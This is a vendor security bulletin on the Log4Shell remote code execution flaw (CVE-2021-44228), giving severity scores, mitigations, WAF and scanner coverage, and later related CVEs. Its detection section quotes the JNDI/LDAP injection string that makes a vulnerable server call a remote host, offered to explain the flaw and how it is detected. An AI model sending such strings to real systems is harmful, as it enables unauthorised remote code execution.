Get a free application, infrastructure and malware scan report - Scan Your Website Now

Subscribe Now Start Free
Blog Home  »  Security Bulletin   »   Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Managed WAF

Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Posted DateDecember 15, 2021
Author Bio
Posted Time 3   min Read

What is Apache Log4j Remote Code Execution (CVE-2021-44228) Vulnerability?

Log4j 2 is a logging library used in many Java applications and services. The library is part of the Apache Software Foundation’s Apache Logging Services project. A remote code execution vulnerability exists in Apache Log4j2 <=2.14.1 JNDI features where configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when the message lookup substitution is enabled. This vulnerability is also known as “Log4Shell”.

What Are the Risks?

A remote attacker can exploit the vulnerability without authentication and successful exploitation can grant full control of the victim’s system. This is known to be actively being exploited in the wild as the POCs are available in public.

Severity: Critical
CVSSv3.1: Base Score:10.0 CRITICAL Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: Base Score: 9.3 HIGH
Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)

Exploit available in public: Yes
Exploit complexity: Low

Do You Need to Worry About It?

The vendor has released the security patch and we strongly advise our customers to update their installations as soon as possible.

Mitigation Steps

1) Upgrade it to Log4j v2.15.0, vulnerability is patched from this version.
2) If you are using a vulnerable version and cannot upgrade, then set the below parameter:

log4j2.formatMsgNoLookups=true

Additionally, an environment variable can be set for all the affected versions:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

3) Alternatively, the JndiLookup class can be removed with the help of similar command as below:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class to remove the class from the log4j-core.

Product Coverage:

Indusface AppTrana blocks exploits targeting the Log4J vulnerability (CVE-2021-44228) and customers behind AppTrana WAF are protected. We highly recommend customers still take the above-mentioned mitigation steps. Protection against this vulnerability was rolled out on Dec 11th.

Indusface WAS can now detect Log4j vulnerabilities. Given the nature of the vulnerability, the detection is out of band. This means, the scanner may inject the attack vector but it may not be called immediately, but called next time Log4j is used by your application. Due to this reporting of the vulnerability is out of band.

When the vulnerability is identified, a notification will show up in the portal informing which assets are compromised a mail will also be sent. A subsequent scan of the asset will update the report with additional details.

Further Details on Log4j Detection:

The vulnerability as already mentioned results from how log messages are handled by log4j processor. When an attacker passes a crafted message like ${jndi:ldap://<serveraddress>/a will result in calls to remote ldap server which can respond with a malicious code that can be executed in your server leading to successful remote code execution.

Apache Log4j Remote Code Execution Vulnerability

For detecting, if the application is vulnerable, the Indusface WAS scanner sends a crafted message to the application, if the application is vulnerable, the JNDI call will be made, which is tracked and logged. If the call is made, we know the application is vulnerable, our intent is to identify vulnerability so we do not respond back with a code and do a successful RCE, but we report that your server is vulnerable to an RCE exploit.

Successors of Log4jShell:

Apache announced another vulnerability in Log4j on Dec, 14th, 2021 and it is tracked as CVE-2021-45046. An attack can perform local denial of service attacks due to an incomplete patch for Log4jShell in certain non-default configurations. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default but the latest Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. We recommend customers upgrade it to the latest version of Log4j.

Also, researchers from Praetorian disclosed a third separate security weakness in Log4j 2.15.0 which can allow attackers to exfiltrate sensitive data in certain circumstances. Technical details or POC are not disclosed to the public as a part of responsible vulnerability disclosure. The vendor has not disclosed any details of the vulnerability & patch as of 16th Dec 2021.

Update on Feb 17: Coverage for Indusface WAS and details on Successor of Log4jShell.

Found this article interesting? Follow Indusface on FacebookTwitter, and LinkedIn to read more exclusive content we post.

Indusface AppTrana

Vivek Gopalan

Vivekanand Gopalan is a seasoned entrepreneur and currently serves as the Vice President of Products at Indusface. With over 12 years of experience in designing and developing technology products, he has a keen eye for building innovative solutions that solve real-life problems. In his previous role as a Product Manager at Druva, Vivek was instrumental in creating the core endpoint data protection solution which helped over 1500 enterprises protect over a million endpoints. Prior to that, he served as a Product Manager at Zighra, where he played a crucial role in reducing online and offline payment fraud by leveraging mobile telephony, collective intelligence, and implicit user authentication. Vivek is a dynamic leader who enjoys building and commercializing products that bring tangible value to customers. In 2010, before pursuing MBA, he co-founded a technology product company, Warmbluke and created a first-of-its-kind innovative Civil Engineering estimator software called ATLAS. The software was developed for both enterprise and for SaaS users. The product helps in estimating the construction cost using CAD drawings. Vivek did his MBA from Queen's University with Specialization in New Ventures. He also holds a Bachelor of Technology degree in Information Technology from Coimbatore Institute of Technology, Anna University, one of the prestigious universities in India. He is the recipient of the D.D. Monieson MBA Award, Issued by Queen's School of Business, presented to a student team which has embraced the team-learning model and applied the management tools and skills to become a peer exemplar. In his spare time, Vivek likes to go on hikes and read books.

Share Article:

Tags:

Join 51000+ Security Leaders

Get weekly tips on blocking ransomware, DDoS and bot attacks and Zero-day threats.

We're committed to your privacy. indusface uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.

Related Posts

log 4j vulnerabilities
Log4j Vulnerability – Technical Details

In December 2021, log4j aka CVE-2021-44228 was publicly released and rapidly was flagged as one of the most critical security vulnerabilities in recent years. This article will talk about this.

Read More
Log4j vulnerability
How to Tackle the Log4j Vulnerability?

Apache Log4j is an open-source logging package for Java distributed under the Apache Software License. Logging and tracing software, like Log4j, collects and stores activity records on a server.    A.

Read More
Real-Time Protection of Log4j
Real-Time Protection of Log4j with AppTrana – Through its Risk-Based Approach

With the discovery of Log4j vulnerability on December 9th (Also known as Log4shell), the cybersecurity world has gone on a tailspin. It is one of the most potent vulnerabilities identified in recent times.

Read More

AppTrana

Fully Managed SaaS-Based Web Application Security Solution

Get free access to Integrated Application Scanner, Web Application Firewall, DDoS & Bot Mitigation, and CDN for 14 days

Get Started for Free Request a Demo

Gartner

Indusface is the only cloud WAAP (WAF) vendor with 100% customer recommendation for 4 consecutive years.

A Customers’ Choice for 2024, 2023 and 2022 - Gartner® Peer Insights™

The reviews and ratings are in!